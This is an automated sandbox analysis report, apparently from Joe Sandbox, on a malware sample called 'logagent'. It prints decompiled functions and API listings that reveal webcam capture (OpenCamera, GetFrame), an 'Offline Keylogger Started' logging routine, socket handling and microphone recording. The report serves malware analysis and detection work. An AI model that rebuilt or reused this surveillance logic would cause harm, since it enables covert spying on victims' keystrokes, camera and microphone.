                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1054C353
                                  • CloseHandle.KERNEL32(80000001), ref: 1054C35C
                                  • GetCurrentProcessId.KERNEL32 ref: 1054C362
                                  • PathFileExistsW.SHLWAPI(?), ref: 1054C38F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 1054C3F2
                                  • GetTempFileNameW.KERNEL32(?,004168B4,00000000,?), ref: 1054C40D
                                  • lstrcatW.KERNEL32(?,004168A8), ref: 1054C41F
                                    • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • ShellExecuteW.SHELL32(00000000,0041578C,?,00000000,00000000,00000001), ref: 1054C461
                                  • Sleep.KERNEL32(000001F4), ref: 1054C4A4
                                  • exit.MSVCRT ref: 1054C4B9
                                  • Sleep.KERNEL32(00000BB8), ref: 1054C588
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$exit$CloseCreateNameOpenPathProcessSleepTemp$CurrentExecuteExistsHandleModuleMutexObjectQueryShellSingleValueWaitlstrcat
                                  • String ID: $eA$WDH
                                  • API String ID: 3869290677-830828062
                                  • Opcode ID: 76753f67ac41234570a61778a4f653f46c84872144a4b4409d4a973c20246337
                                  • Instruction ID: 5b17d46360f1e8800bf288989c3856e4caf793c45c99199ac6d477c4efd4c0bc
                                  • Opcode Fuzzy Hash: 76753f67ac41234570a61778a4f653f46c84872144a4b4409d4a973c20246337
                                  • Instruction Fuzzy Hash: 02918572A00608BBDB415BE0DC4DFEE3F6DEBC9741F108069FA06D7191EB7459858BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401CCF Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t32;
				char* _t33;
				void* _t36;
				void* _t38;
				signed char _t39;
				signed char _t41;
				char* _t42;
				int _t43;
				intOrPtr _t65;
				signed char _t66;
				void* _t68;
				intOrPtr* _t71;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t71 = _t68 + 0x24;
				_t22 = _t65 - 0x3c;
				if(_t22 == 0) {
					_t23 = E0040180C( &_v20, __eflags, 0);
					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t66 = E00406DD9(_t23);
					__eflags = _t66;
					if(_t66 != 0) {
						 *0x41b2ec = E00407033(_t66, "OpenCamera");
						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
						 *0x41b2f4 = E00407033(_t66, "GetFrame");
						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
						 *0x41b2e8 = 1;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
						_push(0x1b);
						goto L15;
					}
				} else {
					_t32 = _t22 - 1;
					if(_t32 == 0) {
						__eflags =  *0x41b2e9;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						_t36 = _t32 - 1;
						if(_t36 == 0) {
							 *0x41b2f0();
							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
						} else {
							_t38 = _t36 - 1;
							if(_t38 == 0) {
								_t39 =  *0x41b2ec();
								__eflags = _t39;
								 *0x41b2e9 = _t39;
								if(__eflags == 0) {
									goto L9;
								} else {
									L8:
									_t33 = E0040180C( &_v20, __eflags, 0);
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									_push(atoi(_t33));
									_push(_a4);
									E00401EA2(__eflags);
								}
							} else {
								if(_t38 == 1) {
									_t41 =  *0x41b2ec();
									_t81 = _t41;
									 *0x41b2e9 = _t41;
									if(_t41 == 0) {
										L9:
										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
										_push(0x41);
										L15:
										E004020C2(_a4);
									} else {
										_t42 = E0040180C( &_v20, _t81, 0);
										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
										_t43 = atoi(_t42);
										 *_t71 = 0x3e8;
										Sleep(??);
										E00401EA2(_t81);
										 *0x41b2f0(_a4, _t43);
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                  0x00401cd9
                                  0x00401cdf
                                  0x00401cf1
                                  0x00401d01
                                  0x00401d10
                                  0x00401d1a
                                  0x00401d21
                                  0x00401d24
                                  0x00401d27
                                  0x00401e08
                                  0x00401e0f
                                  0x00401e1b
                                  0x00401e1e
                                  0x00401e20
                                  0x00401e33
                                  0x00401e43
                                  0x00401e53
                                  0x00401e60
                                  0x00401e67
                                  0x00401e73
                                  0x00401e79
                                  0x00000000
                                  0x00401e79
                                  0x00401d2d
                                  0x00401d2d
                                  0x00401d2e
                                  0x00401df4
                                  0x00401dfb
                                  0x00000000
                                  0x00401e01
                                  0x00401d34
                                  0x00401d34
                                  0x00401d35
                                  0x00401de2
                                  0x00401de8
                                  0x00401d3b
                                  0x00401d3b
                                  0x00401d3c
                                  0x00401d92
                                  0x00401d98
                                  0x00401d9a
                                  0x00401d9f
                                  0x00000000
                                  0x00401da1
                                  0x00401da1
                                  0x00401da6
                                  0x00401dad
                                  0x00401dba
                                  0x00401dbb
                                  0x00401dbe
                                  0x00401dc3
                                  0x00401d3e
                                  0x00401d3f
                                  0x00401d45
                                  0x00401d4b
                                  0x00401d4d
                                  0x00401d52
                                  0x00401dcb
                                  0x00401dd5
                                  0x00401ddb
                                  0x00401e7b
                                  0x00401e7e
                                  0x00401d54
                                  0x00401d59
                                  0x00401d60
                                  0x00401d67
                                  0x00401d6f
                                  0x00401d76
                                  0x00401d80
                                  0x00401d87
                                  0x00401d87
                                  0x00401d52
                                  0x00401d3f
                                  0x00401d3c
                                  0x00401d35
                                  0x00401d2e
                                  0x00401e86
                                  0x00401e8e
                                  0x00401e97
                                  0x00401ea1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00401CF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                  • atoi.MSVCRT ref: 00401D67
                                  • Sleep.KERNEL32 ref: 00401D76
                                    • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                    • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                    • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                  • atoi.MSVCRT ref: 00401DB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                  • API String ID: 3050406488-3547787478
                                  • Opcode ID: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                  • Opcode Fuzzy Hash: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DD3 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E00405DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L00414176();
				_t25 =  &_v36;
				L00414170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                  0x00405dde
                                  0x00405de1
                                  0x00405df0
                                  0x00405df9
                                  0x00405e02
                                  0x00405e06
                                  0x00405e12
                                  0x00405e1b
                                  0x00405e24
                                  0x00405e2d
                                  0x00405e3d
                                  0x00405e5c
                                  0x00405e61
                                  0x00405e69
                                  0x00405e76
                                  0x00405e7c
                                  0x00405e7c
                                  0x00405e86
                                  0x00405e8c
                                  0x00405e92
                                  0x00405e95
                                  0x00405e95
                                  0x00405e9c
                                  0x00405ea6
                                  0x00405eaf

                                  APIs
                                  • GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                  • malloc.MSVCRT ref: 00405E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                  • sprintf.MSVCRT ref: 00405E69
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                  • SetEvent.KERNEL32(00000000), ref: 00405E95
                                  • free.MSVCRT(00000000), ref: 00405E9C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 2201004561-248792730
                                  • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                  • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040122D Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                  • closesocket.WS2_32 ref: 00401266
                                  • ExitThread.KERNEL32 ref: 00401274
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                  • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                  • String ID:
                                  • API String ID: 3470141593-0
                                  • Opcode ID: 4a7001b0b53c75aa6c0ac9d28ec628d27a27c52e3e7050642eb9c879f83a4183
                                  • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                  • Opcode Fuzzy Hash: 4a7001b0b53c75aa6c0ac9d28ec628d27a27c52e3e7050642eb9c879f83a4183
                                  • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402637 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 94timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00402637(void* __ecx, intOrPtr _a4) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				char _v56;
				char* _t42;
				char* _t43;
				char* _t50;
				char* _t51;
				void* _t68;
				void* _t69;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x38)) == 0) {
					return 0;
				}
				if( *0x41bcac != 0) {
					if( *((char*)(__ecx + 0x44)) != 0) {
						GetLocalTime( &_v24);
						_t50 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t51 =  &_v40;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
						printf(_t51);
						_t69 = _t69 + 0x24;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
					}
					_t16 = _t68 + 0x3c; // 0xa
					if( *_t16 != _a4) {
						GetLocalTime( &_v24);
						_t42 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t43 =  &_v56;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
						printf(_t43);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
				return 1;
			}













                                  0x0040263e
                                  0x00402644
                                  0x00000000
                                  0x00402749
                                  0x00402653
                                  0x00402669
                                  0x0040266f
                                  0x0040268b
                                  0x00402699
                                  0x004026a0
                                  0x004026a4
                                  0x004026ae
                                  0x004026b5
                                  0x004026b7
                                  0x004026bd
                                  0x004026c6
                                  0x004026cc
                                  0x004026cc
                                  0x004026d0
                                  0x004026d6
                                  0x004026dc
                                  0x004026f8
                                  0x00402706
                                  0x0040270d
                                  0x00402711
                                  0x0040271b
                                  0x00402722
                                  0x0040272a
                                  0x00402733
                                  0x00402733
                                  0x004026d6
                                  0x0040273c
                                  0x00402740
                                  0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                  • printf.MSVCRT ref: 004026B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
